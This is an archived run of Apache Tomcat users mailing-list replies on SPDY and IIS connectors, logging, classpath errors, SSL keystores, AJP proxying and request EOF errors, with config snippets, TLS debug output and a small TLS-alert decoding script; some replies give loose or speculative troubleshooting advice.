   I would highly recommend that you read this blog post I wrote several
   years ago that can help you look for obvious errors by providing
   examples for what JDBC code should look like -- if you are managing
   your own JDBC calls of course:
  
  
  http://blog.christopherschultz.net/index.php/2009/03/16/properly-handling-pooled-jdbc-connections/
  
   We are looking to hire a consultant that would come to Fredericton,
   NB, Canada to work with us on this problem. Serious inquiries only.
   I will be looking for proof that you have extensive experience with
   Tomcat, Java Spring and c3p0.
  
   If you are interested, send me your resume (through your company
   or individually) and send me as much proof as possible of your
   experience with the specific technologies mentioned.
  
   While there is certainly no prohibition against doing so, this isn't
   really a help wanted message board. We are happy to help you -- for
   free! -- via email to solve your own problems. If you find this free
   forum helpful, please 

RE: Status of the current IIS ISAPI Redirector for Tomcat

2014-02-15 Thread Martin Gainty
This is a TC Users list so I will redirect the conversation to how do we use 
SPDY in a Tomcat implementation
TO Wit: what you're asking is there support for SPDY Protocol in any version of 
TOMCAT?

Since SPDY requires the use of SSL/TLS (with TLS extension NPN)

Which version TC Container supports TLS/NPN?

 

*gruss*
Martin 
__ 

  



 From: kpreis...@apache.org
 To: users@tomcat.apache.org
 Subject: RE: Status of the current IIS ISAPI Redirector for Tomcat
 Date: Sat, 15 Feb 2014 15:00:44 +0100
 
 Hi Angel and Bilal,
 
 thank you for your replies.
 
 
  -Original Message-
  From: Angel Java Lopez [mailto:ajlopez2...@gmail.com]
  Sent: Saturday, February 15, 2014 11:59 AM
  To: Tomcat Users List
  Subject: Re: Status of the current IIS ISAPI Redirector for Tomcat
  
  Very interesting!
  
  Yes, managed code is the path to follow.
  
  First idea non-blocking IO (from C# client side): use the new async/await
  for the communication. But force to use the new .NET framework and Visual
  Studio. And await is a wait on the current threads:
  
  http://msdn.microsoft.com/en-us/library/hh750082.aspx
  
  Maybe, a node.js approach, with a callback:
  
  http://stackoverflow.com/questions/16894907/creating-asynchronous-
  methods-with-task-factory-and-callback
  and only .NET 4.0:
  http://msdn.microsoft.com/en-us/library/dd537612(v=vs.100).aspx
  
  I don't still see the value of await: it blocked the current thread. I
  guess it is better to use a callback
 
 An await on a Task in C# should internally return the current thread back to 
 a threadpool, and use a callback on another thread to continue execution of 
 the method when the Task is finished, so that threads are not blocked when 
 waiting e.g. for an I/O operation to complete. For a full utilization of 
 asynchronous I/O, one would not only have to use async read/write operations 
 when forwarding the request to Tomcat, but also async flush the response body 
 at IIS to the client (and async read the request body). Although the .Net 
 HttpResponse also seem to have BeginFlush() and EndFlush() methods that apply 
 the old-style async programming pattern, in the SPDY Redirector (see below) 
 I'm using Task.Factory.FromAsync(...) to convert these Begin/End-Methods into 
 one that returns a Task, so that it can be integrated into the existing 
 Task-based async code.
 
 For async flush and read operations at IIS to work, one will need to create 
 an async module (IHttpModule, but use context.AddOnBeginRequestAsync() 
 methods to add event handlers) or an async handler (derived from 
 HttpTaskAsyncHandler).
 
 This is the approach that I use on a draft of an SPDY redirector that can 
 already be tested with Jetty (but not yet with Tomcat), see [1]. After 
 switching from blocking I/O to async methods, the number of threads of the 
 IIS apppool (w3wp.exe) was greatly reduced when having a slow output producer 
 (servlet) on the Jetty side, and a fast client connecting to IIS (but should 
 also work for the more likely scenario: A fast output producer (Jetty) and a 
 slow client); as with blocking I/O, the IIS threads would spend most of their 
 time with doing nothing, whereas with the async approach, they can do other 
 things meanwhile.
 
 This approach suits the idea of a multiplexing SPDY as you can send multiple 
 requests on a single SPDY connection, so it doesn't block resources like 
 sockets or threads for the duration of an request. With SPDY, it should also 
 be possible to forward Websocket connections which is AFAIK not possible with 
 AJP.
 
 
  
  Angel Java Lopez
  @ajlopez
  
  
  On Fri, Feb 14, 2014 at 9:26 PM, Bilal S bilal.so...@gmail.com wrote:
  
   Konstantin,
 
 snip
 
   ==
   You raise good points. I have run into similar issues and thus created my
   own project outside the Apache foundation three years ago (BonCode). It is
   a C# based AJP connector. It can currently be used with Tomcat, JBOSS,
   Jetty. From support requests I am surmising that is currently bundled with
   software from a few manufacturers including: EMC, CSC, Siemens and others
   instead of ISAPI redirector.
  
   Thus, I do encourage the update of the current IIS connection mechanism to
   a more up-to-date method. Using a managed code mechanism is the way to go
   in my opinion.
   In the long run SPDY may also be of interest for the same purpose. The more
   choices the better.
  
   The following are differences already in existence with BonCode and in
   response to your extensive writing, only read on if you are curious:
   
 
 Thank you for you detailed response, this is very helpful.
 
 snip
 
6.
   
As far as I can see, the ISAPI redirector uses blocking I/O when
forwarding requests to Tomcat.
   
This means when a slow client sends a request to IIS which gets forwarded
to Tomcat, and Tomcat starts to send the response, in the IIS worker
process at least 

RE: Unable to shutdown Tomcat

2014-02-15 Thread Martin Gainty
MG> ton of log information is missing..you must have disabled the logs somehow

 Date: Fri, 14 Feb 2014 21:51:55 -0500
 From: ch...@christopherschultz.net
 To: users@tomcat.apache.org
 Subject: Re: Unable to shutdown Tomcat
 
 
 Pooja,
 
 On 2/14/14, 5:49 PM, Pooja Swamy wrote:
  Okay. Here you go -
  
  myMac:runtime test$ bin/catalina.sh run
  Using CATALINA_BASE:   /Users/test/software/runtime
  Using CATALINA_HOME:   /Users/test/software/runtime
  Using CATALINA_TMPDIR: /Users/test/software/runtime/temp
  Using JRE_HOME:        /System/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home
  Using CLASSPATH:       /Users/test/software/runtime/bin/bootstrap.jar:/Users/test/software/runtime/bin/tomcat-juli.jar
  Feb 14, 2014 2:47:46 PM org.apache.catalina.core.AprLifecycleListener init
  INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: .:/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java
 
 There must be more. Is there nothing else printed after that? You go
 back to a command prompt?
MG> confirm these entries in $CATALINA_HOME/conf/catalina.policy

grant codeBase "file:${catalina.home}/bin/tomcat-juli.jar" {
permission java.io.FilePermission
 "${java.home}${file.separator}lib${file.separator}logging.properties", "read";

permission java.io.FilePermission
 "${catalina.base}${file.separator}conf${file.separator}logging.properties", "read";
permission java.io.FilePermission
 "${catalina.base}${file.separator}logs", "read, write";
permission java.io.FilePermission
 "${catalina.base}${file.separator}logs${file.separator}*", "read, write";


MG> also if you do have a custom logging.properties you will need to define LOGGING_CONFIG
MG> during catalina.bat start e.g.

rem   LOGGING_CONFIG  (Optional) Override Tomcat's logging config file
rem   Example (all one line)
rem   set LOGGING_CONFIG=-Djava.util.logging.config.file=%CATALINA_BASE%\conf\logging.properties

 - -chris
MG> - -martin


 

  

RE: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.

2014-02-15 Thread Martin Gainty

  

 Date: Fri, 14 Feb 2014 14:19:04 -0800
 Subject: Re: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.
 From: davek1...@gmail.com
 To: users@tomcat.apache.org
 
 OK I added servlet-api.jar and jsp-api.jar to the
 Launch Configuration | Classpath | Bootstrap Entries
 
 and get the following error report:
 HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver
 
 
 HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver

MGDave
MGcan you confirm el-api.jar is located in lib folder of $CATALINA_HOME ?
MG$CATALINA_HOME/lib/el-api.jar
MGMartin-
 -- 
 
 *note* *The full stack trace of the root cause is available in the Apache
 Tomcat/7.0.50 logs.*
 --
 Apache Tomcat/7.0.50
  

RE: sudden increase in tomcat sessions..?

2014-02-08 Thread Martin Gainty
DOS (Denial of Service) Attack

one type is endless ping

if someone is running an endless loop of ping attacks on your TC server

you can disable ICMP on TC server
https://www.serverintellect.com/support/windowsserversecurity/disable-icmp-requests/

 

DOC attack usually results in TROJ_MDROPPER.* on system
NAV and McAfee can detect these malware attachments on Word Docs

http://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-doc-files-in-targeted-attack/


HTH
Martin 

  



 Date: Sat, 8 Feb 2014 19:54:32 -0500
 Subject: Re: sudden increase in tomcat sessions..?
 From: kumarkm...@gmail.com
 To: users@tomcat.apache.org
 
 Hi David,
 Thanks for your reply. How can I verify that it is a DOC attack? Which
 log should I refer to? Please guide me.
 
 Thanks,
 Kumar.
 
 
 On Sat, Feb 8, 2014 at 7:42 PM, David Kerber dcker...@verizon.net wrote:
 
  On 2/8/2014 7:08 PM, Kumar Muthuramalingam wrote:
 
  Hi,
  I'm using tomcat version 6 and 7. One day there was a sudden increase in
  number of sessions in both tomcats. And all the sessions had no username,
  same lastaccessed time, same created time and the inactive time was
  00:00:00. It is not happening always but it happens some times on some day.
  Can't predict. And we have set the idle timeout as -1 because we have to.
  When I try to dig the log, it showed that the load balancer IP was sending
  many ping requests to our application. Can anybody tell why this is
  happening and how can I find the cause?
 
 
  DOS attack?
 
 
 
  Thanks,
  Kumar.
 
 
 
 
 
  

RE: Menu is not working for since Tomcat 7.0.42

2014-01-09 Thread Martin Gainty


  


 Date: Thu, 9 Jan 2014 15:41:21 +0530
 Subject: Menu is not working for since Tomcat 7.0.42
 From: cch...@gmail.com
 To: users@tomcat.apache.org
 
 Hello,
 
 We have a web application which has menus and sub menus which are basically
 divs. On clicking on menu we are showing the sub menus. This happens
 through AJAX request.
 
 The application was working fine till Tomcat 7.0.41. But since 7.0.42 it
 stopped working. We are using jdk 7.
 
 We did not change anything between 7.0.41 and 7.0.42 in our side. Could
 anyone give me pointer regarding the issue?
MGImpossible... until you show us the code you are running
MGZip up (server.xml and web.xml) jsps, java code, templates..the works..put on dropbox and send the link
 
 Thanks in advance.
 
 Chinmoy
  

RE: detailed APR/SSL logging

2014-01-07 Thread Martin Gainty


  


 Date: Tue, 7 Jan 2014 14:51:21 +0500
 Subject: detailed APR/SSL logging
 From: sanaulla...@gmail.com
 To: users@tomcat.apache.org
 
 Hi,
 
 Does anyone know how I can get the detailed APR/SSL debug logs? I need to
 know where my SSL session is getting broken. There is nothing in the
 catalina.out log.
 
 usage: java org.apache.catalina.startup.Catalina [ -config {pathname} ] [
 -nonaming ] { -help | start | stop }
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init
 INFO: Loaded APR based Apache Tomcat Native library 1.1.29 using APR
 version 1.5.1.
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init
 INFO: APR capabilities: IPv6 [true], sendfile [true], accept filters
 [false], random [true].
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener
 initializeSSL
 INFO: OpenSSL successfully initialized (OpenSSL 1.0.1e 11 Feb 2013)
 Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init
 INFO: Initializing ProtocolHandler [http-apr-8080]
 Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init
 INFO: Initializing ProtocolHandler [http-apr-0.0.0.0-8443]
 Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.Catalina load
 INFO: Initialization processed in 696 ms
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardService
 startInternal
 INFO: Starting service Catalina
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardEngine
 startInternal
 INFO: Starting Servlet Engine: Apache Tomcat/7.0.47
 Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/docs
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/manager
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/ROOT
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/host-manager
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/examples
 Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start
 INFO: Starting ProtocolHandler [http-apr-8080]
 Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start
 INFO: Starting ProtocolHandler [http-apr-0.0.0.0-8443]
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.Catalina start
 INFO: Server startup in 935 ms
 
 
 --
 Server looks up properly with openssl and certs but when I try to connect
 to it with openssl s_client it's getting an error
 --
 root@ubuntu:/home/san/certs/pay-test# openssl s_client -connect 127.0.0.1:8443 -tls1_2 -debug
 CONNECTED(0003)
 write to 0x8a03258 [0x8a0cfe3] (319 bytes = 319 (0x13F))
  - 16 03 01 01 3a 01 00 01-36 03 03 52 cb cd f1 45 :...6..R...E
 0010 - e9 1b fc 26 6f d9 b3 c7-90 58 88 80 92 eb 3f 57 ...oX?W
 0020 - ab 9f be 49 2d 52 b4 1f-f1 c1 d6 00 00 9e c0 30 ...I-R.0
 0030 - c0 2c c0 28 c0 24 c0 14-c0 0a c0 22 c0 21 00 a3 .,.(.$..!..
 0040 - 00 9f 00 6b 00 6a 00 39-00 38 00 88 00 87 c0 32 ...k.j.9.8.2
 0050 - c0 2e c0 2a c0 26 c0 0f-c0 05 00 9d 00 3d 00 35 ...*=.5
 0060 - 00 84 c0 12 c0 08 c0 1c-c0 1b 00 16 00 13 c0 0d 
 0070 - c0 03 00 0a c0 2f c0 2b-c0 27 c0 23 c0 13 c0 09 ./.+.'.#
 0080 - c0 1f c0 1e 00 a2 00 9e-00 67 00 40 00 33 00 32 .g.@.3.2
 0090 - 00 9a 00 99 00 45 00 44-c0 31 c0 2d c0 29 c0 25 .E.D.1.-.).%
 00a0 - c0 0e c0 04 00 9c 00 3c-00 2f 00 96 00 41 c0 11 /...A..
 00b0 - c0 07 c0 0c c0 02 00 05-00 04 00 15 00 12 00 09 
 00c0 - 00 14 00 11 00 08 00 06-00 03 00 ff 01 00 00 6f ...o
 00d0 - 00 0b 00 04 03 00 01 02-00 0a 00 34 00 32 00 0e ...4.2..
 00e0 - 00 0d 00 19 00 0b 00 0c-00 18 00 09 00 0a 00 16 
 00f0 - 00 17 00 08 00 06 00 07-00 14 00 15 00 04 00 05 
 0100 - 00 12 00 13 00 01 00 02-00 03 00 0f 00 10 00 11 
 0110 - 00 23 00 00 00 0d 00 22-00 20 06 01 06 02 06 03 .#.. ..
 0120 - 05 01 05 02 05 03 04 01-04 02 04 03 03 01 03 02 
 0130 - 03 03 02 01 02 02 02 03-01 01 00 0f 00 01 01 ...
 read from 0x8a03258 [0x8a08a93] (5 bytes = 5 (0x5))
  - 15 03 03 00 02 .
 read from 0x8a03258 [0x8a08a98] (2 bytes = 2 (0x2))
  - 02 28 .(
 3074095420:error:14094410:SSL 
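
Added example, not part of the original thread: the last two reads in the s_client -debug output above form one TLS record, and decoding it shows what the server answered to the ClientHello. The function names are this example's own; SAMPLE is copied from the quoted output as it appears in this archive.

```python
import re
import struct

# Copied from the page: the last two "read from" blocks of the quoted
# `openssl s_client -debug` output, exactly as the archive shows them.
SAMPLE = """\
read from 0x8a03258 [0x8a08a93] (5 bytes = 5 (0x5))
 - 15 03 03 00 02 .
read from 0x8a03258 [0x8a08a98] (2 bytes = 2 (0x2))
 - 02 28 .(
"""

# TLS record layer constants (RFC 5246, sections 6.2.1 and 7.2; subset).
CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert",
                 22: "handshake", 23: "application_data"}
VERSIONS = {(3, 0): "SSL 3.0", (3, 1): "TLS 1.0",
            (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}
ALERT_LEVELS = {1: "warning", 2: "fatal"}
ALERT_DESCRIPTIONS = {
    0: "close_notify", 10: "unexpected_message", 20: "bad_record_mac",
    40: "handshake_failure", 42: "bad_certificate",
    44: "certificate_revoked", 45: "certificate_expired",
    46: "certificate_unknown", 47: "illegal_parameter", 48: "unknown_ca",
    70: "protocol_version", 71: "insufficient_security",
    80: "internal_error",
}

BLOCK_RE = re.compile(r"^\s*(read from|write to)\s+\S+\s+\[\S+\]\s+\((\d+) bytes")
HEX_PAIR_RE = re.compile(r"^[0-9a-fA-F]{2}$")


def extract_io(debug_text):
    """Return [(direction, payload)] for every read/write block in the dump.

    The byte count announced in the block header bounds how many hex pairs
    are taken, so the trailing ASCII column is never mistaken for data.
    """
    blocks = []
    for line in debug_text.splitlines():
        header = BLOCK_RE.match(line)
        if header:
            direction = header.group(1).split()[0]  # "read" or "write"
            blocks.append([direction, int(header.group(2)), bytearray()])
            continue
        if not blocks or " - " not in line:
            continue
        _, expected, payload = blocks[-1]
        # Dump lines look like "0010 - e9 1b ... c7-90 ...  ascii".
        for token in line.split(" - ", 1)[1].replace("-", " ").split():
            if len(payload) >= expected or not HEX_PAIR_RE.match(token):
                break
            payload.append(int(token, 16))
    return [(d, bytes(p)) for d, _, p in blocks]


def parse_records(stream):
    """Split a byte stream into TLS records (5-byte header + fragment)."""
    records, offset = [], 0
    while offset < len(stream):
        if len(stream) - offset < 5:
            raise ValueError("truncated TLS record header")
        ctype, major, minor, length = struct.unpack_from("!BBBH", stream, offset)
        fragment = stream[offset + 5:offset + 5 + length]
        if len(fragment) < length:
            raise ValueError("truncated TLS record body")
        records.append({
            "type": CONTENT_TYPES.get(ctype, "unknown(%d)" % ctype),
            "version": VERSIONS.get((major, minor), "%d.%d" % (major, minor)),
            "fragment": fragment,
        })
        offset += 5 + length
    return records


def server_alerts(debug_text):
    """Decode every plaintext alert record received from the peer."""
    received = b"".join(p for d, p in extract_io(debug_text) if d == "read")
    alerts = []
    for record in parse_records(received):
        if record["type"] != "alert" or len(record["fragment"]) != 2:
            continue  # an encrypted alert is longer than two bytes
        level, description = record["fragment"]
        alerts.append({
            "version": record["version"],
            "level": ALERT_LEVELS.get(level, "unknown(%d)" % level),
            "description": ALERT_DESCRIPTIONS.get(
                description, "unknown(%d)" % description),
        })
    return alerts


if __name__ == "__main__":
    for alert in server_alerts(SAMPLE):
        print("%(version)s %(level)s alert: %(description)s" % alert)
```
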

RE: Problem configuring SSL

2014-01-07 Thread Martin Gainty
  


 Date: Tue, 7 Jan 2014 14:41:15 -0500
 Subject: Re: Problem configuring SSL
 From: a-ko...@northwestern.edu
 To: users@tomcat.apache.org
 
 Gentlemen, thanks a lot for your help. I figured out what the problem was.
 It was not related to tomcat configuration, but to my keystore. The reason
 is that once you import a client certificate under the same alias as the
 private pair, they both get merged under the same alias inside keystore.
 Using keytool -delete command, meant to remove the certificate only,
 deletes the private pair as well. I noticed that once I dumped keystore
 content for my keystore and a keystore on one of my other servers. Luckily,
 I had a backup of the keystore I made right after it was created. Importing
 the certificates into that keystore resolved the issue.

MGI *hope* you enabled at least ONE cipher for SSL Connector
MGUsually the big players (VeriSign/Thawte) will provide valid CA cert/valid key in the supplied pfx
MGglad to hear that worked for you
 
 
 On Sun, Jan 5, 2014 at 3:59 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
 
  Alex,
 
  On 1/5/14, 12:30 PM, Alex Kogan wrote:
   I have a strange problem configuring SSL to work with Tomcat.
   Environment: Tomcat 7.0.42 CentOS 5.10 Java 1.7.0_45
  
   It's a new Tomcat installation. All keystore operations were done
   with keytool. I imported CA root/intermediate certificate and
   client certificate, configured SSL connector in server.xml. I have
   this same setup on another server that works fine. Connecting to
   this server via http works.
  
   1. If I try to connect this address via https in Chrome I get:
   This Webpage is not available. In Firefox: Error code:
   ssl_error_no_cypher_overlap
 
  Sounds familiar.
 
  Please post your Connector configuration(s) from your server.xml
  file. Remember to remove any sensitive information from the configuration.
 
  Also please post all of the startup messages from Tomcat's
  logs/catalina.out file: we need to see the versions of various things
  and what components (if any) suffer problems starting up.
 
   3. Here's a list of enabled ciphers using SSLInfo:
  
   #java -showversion SSLInfo
 
  Nice to see someone is getting some use out of that. ;)
 
  - -chris
 
 
 
 
 -- 
 Software Engineer
 Department of Psychiatry and Behavioral Sciences
 Northwestern University
 
 a-ko...@northwestern.edu
  

RE: expired crl file

2014-01-04 Thread Martin Gainty
 Date: Sat, 4 Jan 2014 09:18:22 +0100
 Subject: expired crl file
 From: jjaku...@gmail.com
 To: users@tomcat.apache.org
 
 When I place expired crl file tomcat starts without any visible stack trace
 in logs,
 but I cannot login with valid certificates.
MG

$CATALINA_HOME/conf/setenv.sh

# Uncomment the next line to print SSL debug trace in catalina.out
#CATALINA_OPTS="$CATALINA_OPTS -Djavax.net.debug=ssl"
 MG 

 
 Is there any solution for this feature?
 
 BTW, how can I check validity/expiration date of crl file ?
 
 Regards
 Jakub

MGGood luck
MGMartin-
  

RE: Symantec SSL cert in tomcat 6

2014-01-03 Thread Martin Gainty
MGOgnjen
 Gene,
 
 On 3.1.2014 14:55, Gene Matthews wrote:
  The Symantec instructions say to ensure the alias for the ssl cert has an 
  Entry Type of PrivateKeyEntry.  Mine DOES NOT.  Instructions say if it does 
  not, to please import the certificate in the “Private Key” alias.
 
 With JKS keystore you must keep private key and certificates in the same 
 keystore.
MGSince a pfx that Verisign provides contains key and cert
MGWindows servers use .pfx files to contain the public key files (your SSL Certificate files, provided by DigiCert) and the associated private key file (generated by your server as part of the CSR).

MGperhaps you are referring to the key/certificate combination in pfx?

 Therefore, you shouldn't import server certificate and inter. 
 certificates into brand new keystore, but into the old keystore -- the 
 one you used to create key pair, and to generate CSR.
MGCSR is the request to CA Authority (Verisign) to sign (digitally identify) this certificate
MGcertificate signing request (also CSR or certification request) is a message sent from an applicant to a certificate authority in order to apply for a digital identity certificate. The most common format for CSRs is the PKCS#10 specification
 
 I find it strange that Symantec/Verisign didn't mention that explicitly 
 in their documentation.
MGagreed
 
  It also says to ensure the Certificate chain length is 4.
 
 Once you import certificates into the right keystore, check that again.
 
 
  PS:  How does one search the archives of this list?  When I browse the 
  archive site I don’t see a search field anywhere.  So I’ve been googling 
  without coming up with a solution. it is probably out there but I don’t 
  know enough to recognize it :-(
 
 http://tomcat.apache.org/lists.html
 
 Search for Archives.
 
 -Ognjen
 
 
  

RE: Java to JavaScript RMI framework available.

2014-01-02 Thread Martin Gainty
Johann-
 
If your design supports Comet, Polling or Piggyback you *may* want to take a look at 
Joe Walker's DWR (Direct Web Remoting)

http://directwebremoting.org/dwr/index.html

*Kind regards*
Martin --


  



 Date: Thu, 2 Jan 2014 15:54:01 -0800
 Subject: Re: Java to JavaScript RMI framework available.
 From: igor.uris...@gmail.com
 To: users@tomcat.apache.org
 
 Johan,
 
 
 On Thu, Jan 2, 2014 at 1:25 AM, Johan Compagner jcompag...@servoy.com wrote:
 
  does it also do the other way around?
  So also having the endpoint on the server that has methods that can be
  called from javascript in a very easy way?
 
 
  It doesn't. There is already a mechanism that sits above simple message
 passing, for calling into
 the server: XMLHttpRequest, aka AJAX. Competing with that would have taken
 more thought and
 effort than so far I have been able to put into FERMI. I imagine that if
 this gets some acceptance,
 offering a fully symmetric RMI may become a viable idea. Not on the
 immediate roadmap, though.
 -Igor.
 
 
 
  On 31 December 2013 01:55, Igor Urisman igor.uris...@gmail.com wrote:
 
   Folks,
  
   I needed to write this for something I am working on and thought there
   might be a wider audience for it.
   Tomcat 8 supports standard compliant Websockets, which provide convenient
   asynchronous full-duplex
   server to client data transport. The framework I am offering builds on
  top
   of that a feature rich remote
   method invocation paradigm. Please check it out.
  
   https://github.com/iurisman/FERMI
   Apache 2.0 license.
  
   Happy coding.
   Igor.
  
 
 
 
  --
  Johan Compagner
  Servoy
 
  

RE: Start the Tomcat server in the server view and go to http://localhost:8080/

2013-12-27 Thread Martin Gainty
Frank 

 

Context Path / is mapped to 'ROOT'


create ROOT.WAR
uncompress ROOT.WAR to $CATALINA_HOME/webapps/ROOT 
then the first and only webapp you see when you go to

http://localhost:8080


will be  root.war

 

http://www.coderanch.com/t/424290/Tomcat/deploy-Root-Tomcat-Website

Good luck!
Martin --





 


  



 From: frank.luga...@amdocs.com
 To: users@tomcat.apache.org
 Subject: Start the Tomcat server in the server view and go to 
 http://localhost:8080/
 Date: Fri, 27 Dec 2013 19:51:26 +
 
 Hi All,
 I have a very simple question but it seems I can't find this option. Tried to 
 google several times! Can someone please tell me how to Start the Tomcat 
 server in the server view and go to http://localhost:8080/?
 Thank you
 ~Frank
 
  

RE: V 7 047 windows x64

2013-12-26 Thread Martin Gainty

  


 Date: Thu, 26 Dec 2013 21:24:27 +0100
 Subject: Re: V 7 047 windows x64
 From: jbmo...@gmail.com
 To: users@tomcat.apache.org
 
 I was testing the EL in a .jsp file under Eclipse Kepler.
 Now I copied the project files under c:\tomcat7\webapps and recompiled the
 java sources.
 And the EL works!
 So the EL problems are in the Eclipse Kepler setup.
MGthen you should contact the support staff at Eclipse to let them know of 
this significant bug in Kepler 

 Many thanks for your reply.
 Jean
 
 
 On Thu, Dec 26, 2013 at 3:16 PM, André Warnier a...@ice-sa.com wrote:
 
  JB MORLA wrote:
 
  Hi,
 
  I can't use EL in .jsp files.
  I have searched the web and installed jasper-el.jar and javaee-api 7 0 in
  the \lib directory,
  but I keep getting the ELResolver error.
 
  Hi.
  You would have a much higher probability of getting useful and quick help,
  if you pasted the original corresponding Tomcat error log lines in your
  message, like here :
 
 
 
 
  (Note: really do a cut-and-paste directly in your mail message to the
  list. Do not attach the error log as attachment. This list strips most
  attachments).
 
 
 
 
 
  

RE: EOFException in AjpNioProcessor

2013-12-21 Thread Martin Gainty


  


 Subject: Re: EOFException in AjpNioProcessor
 From: jsb_tom...@360works.com
 Date: Sat, 21 Dec 2013 16:58:07 -0500
 To: users@tomcat.apache.org
 
 On Dec 18, 2013, at 1:40 PM, André Warnier a...@ice-sa.com wrote:
 
  Jesse Barnum wrote:
  On Dec 18, 2013, at 12:27 PM, Jesse Barnum jsb_tom...@360works.com wrote:
  I'm seeing this error a lot in my log files. It happens when I am trying 
  to read from the request InputStream. Should I be concerned about this, 
  or is it just the equivalent of the user clicking 'stop' in their browser?
  
  SEVERE: An error occurred while handling request 
  /WSMRegister/LicenseCheck/handshake
  java.io.EOFException
  Forgot to mention, I'm running version 7.0.35 on Ubuntu Linux on Amazon 
  EC2.
  
  Well, it seems that you have the explanation right there.
  If com.prosc.licensecheck.LicenseCheck.doPost is your code, then that's 
  where the problem is : you are trying to read from the request input 
  stream, when there is no more data to read and you have already seen its 
  EOF.
  Why there is no more data to read is another question, and it could be that 
  the client did something wrong. But the code in those classes who do the 
  read, obviously is not coping well with that case.
  
 
 Yes, com.prosc.licensecheck.ListCheck.doPost is my code. It would not be hard 
 to catch the exception there and ignore it.
 
 I guess another way to phrase the question is, what would cause a 
 java.io.EOFException to get thrown? I don't want to ignore it if it's trying 
 to tell me something important.
 
 I am used to seeing ClientAbortException: java.net.SocketException: Broken 
 pipe. 
MGError in Transport..your apache or tomcat servers (or one of intervening routers) is unable to complete the transmission
 Is the EOFException basically the same thing?
MGAs Andre said, there is no more data from Request
 
 My concern is that there might be some misconfiguration between the Apache 
 front end and the Tomcat NIO connector that might be causing it.
MG..possibly...lets take a look..

 
  

RE: Exception in CoyoteAdapter class

2013-12-20 Thread Martin Gainty
Mr. AT

Martínthe port and the protocol must match the AJP connector configuration in Tomcat's server.xml
MartínThe port must be 8009
MartínEnable the TLS protocol (but not SSLv2)
 
http://www.zeitoun.net/articles/configure-mod_proxy_ajp-with-tomcat/start

MartínKind regards from Dorchester MA
  


 From: at.s...@everis.com
 To: users@tomcat.apache.org
 Subject: RE: Exception in CoyoteAdapter class
 Date: Fri, 20 Dec 2013 08:30:19 +
 
 Hi,
 
 We are concerned about the issues we found some weeks ago, do you have any 
 suggestions about it?
 
 
 Best Regards,
 AT
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net] 
 Sent: Monday, 09 December 2013 22:51
 To: Tomcat Users List
 Subject: Re: Exception in CoyoteAdapter class
 
 
 AT,
 
 On 12/9/13, 6:43 AM, at.silk wrote:
  2. What is in front of Tomcat? An Apache HTTPD server? - Right.
  
  Is Apache HTTPD accessed via HTTPS? - Right, via HTTPS
  
  How mod_jk is configured there? Is mod_jk configured to pass 
  SSL_SESSION_ID to Tomcat?
  
  AT: This is our configuration:
  AllowCONNECT 443
  SSLEngine on
  SSLProxyEngine on
  SSLProxyVerify none
  SSLOptions +StdEnvVars +ExportCertData
  SSLProtocol all -SSLv2
  SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW
  SSLCertificateFile xxx.crt
  SSLCertificateKeyFile xxx.key
  ProxyPass / ajp://localhost:8010/ connectiontimeout=3600 timeout=3600
  ProxyPassReverse / ajp://localhost:8010/
 
 Note a note: this is a mod_proxy_ajp configuration, not a mod_jk one.
 I know that mod_jk uses SSLOptions +StdEnvVars to pass the SSL session id to 
 Tomcat, but I'm sorry, I don't know about mod_proxy_ajp. I can imagine that 
 it would operate in a similar way, but the mod_proxy_ajp documentation isn't 
 as forthcoming as the mod_jk documentation.
 
 - -chris
  

RE: ssl_error_internal_error_alert in tomcat 7‏

2013-12-19 Thread Martin Gainty
  


 Date: Thu, 19 Dec 2013 15:41:13 -0500
 From: ch...@christopherschultz.net
 To: users@tomcat.apache.org
 Subject: Re: ssl_error_internal_error_alert in tomcat 7‏
 
 
 Jaya,
 
 On 12/19/13, 2:54 PM, jaya ravindran wrote:
  I am getting SSL error in firefox when connecting to tomcat
  server. Apache Tomcat Version 7.0.22 using JSSE configuration
 
 You should really upgrade from your 2-year-old version. Tomcat 7 is on
 version 7.0.47 these days. It's possible something has been fixed.
 
  java version 1.6.0_41 using 64 bit . IE and Chrome works fine
  although I can see the following message in Chrome . The connection
  uses SSL 3.0 When I edit firefox and set
  security.tls.version.max=0, I can get connection. My ssl config is
  below.
